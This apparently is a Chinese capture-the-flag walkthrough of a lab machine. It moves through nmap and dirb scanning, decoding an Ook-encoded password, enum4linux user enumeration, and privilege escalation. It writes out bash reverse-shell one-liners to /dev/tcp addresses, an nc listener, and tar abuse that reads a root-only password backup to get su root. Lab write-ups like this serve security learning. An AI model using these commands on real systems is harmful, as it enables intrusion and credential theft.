开机显示ip也可以不用扫描

首先使用nmap扫描

去访问网页

使用dirb扫描这个网页发现并没有什么

查看原码发现ook解密

对其进行解码
得到一窜字符记下来,后面有用
 
在后面加上端口号访问是两个登录界面

使用enum4linux对网页进行扫描,得到用户名cyber enum4linux(smb专用扫描器)

结合上面解密得到的密码进行登录

在命令行中输入ls可以看见有user.txt文件进行查看可以得到第一个flag

进行提权
bash 反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8888 <&1' 先编写

触发
bash -i >& /dev/tcp/ip/1234 0>&1

kali使用nc 进行连接

连接成功开始提权

发现一个旧的密码文件,需要root权限才能执行,因为tar命令为root权限而当前用户也可以执行使用tar命令

先将将文件压缩,再解压即可

tar命令压缩解压该文件  ./tar -czvf pass.zip.gz /var/backups/.old_pass.bak如下最后查看后可得到一串字符

因为是root权限的pass命令的文件所以可能是root密码

su root提权成功

 
 
 
 
 
 
 
 
 
 
 
 
 
 

最新文章

  1. 【原创】如何确定Kafka的分区数、key和consumer线程数
  2. linux 安装mysql数据库——tar.gz包解压安装法
  3. 『TCP/IP详解——卷一:协议』读书笔记——10
  4. phpdesigner 的配置
  5. windows下怎么打开psql命令
  6. Google地图接口API之地图控件集(五)
  7. 刀哥多线程GCD核心概念gcd
  8. PHP连接SQL Server(sqlsrv)
  9. AndroidAnnotations部署
  10. 将Oracle JDBC驱动库安装到本地仓库
  11. [.net 面向对象程序设计深入](9).NET Core 跨平台开发环境搭建
  12. 【TensorFlow入门完全指南】模型篇&#183;逻辑斯蒂回归模型
  13. python 使用标准库连接linux实现scp和执行命令
  14. 如何配置springboot一访问服务器本地图片
  15. synchronized(this) 与synchronized(class) 之间的区别
  16. 如何将网页保存为PDF文件
  17. 关于library cache lock和row cache lock产生的常见原因
  18. Laravel5 创建自定义门面(Facade)
  19. mongodb常用查询语法
  20. 【APP测试(Android)】--安全测试

热门文章

  1. BMP位图之4位位图(二)
  2. OSSCore 开源解决方案介绍
  3. kubernetes之Endpoint引入外部资源实践;
  4. spring使用junit单元测试
  5. gcd(数论)
  6. QPanter 绘画
  7. 四 多例模式【Multition&#160;Pattern】&#160;来自CBF4LIFE 的设计模式
  8. c++基础思维导图2
  9. KingbaseES V8R6备份恢复案例之--删除test数据库后sys_backup.sh备份
  10. 《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(19)-Fiddler精选插件扩展安装,将你的Fiddler武装到牙齿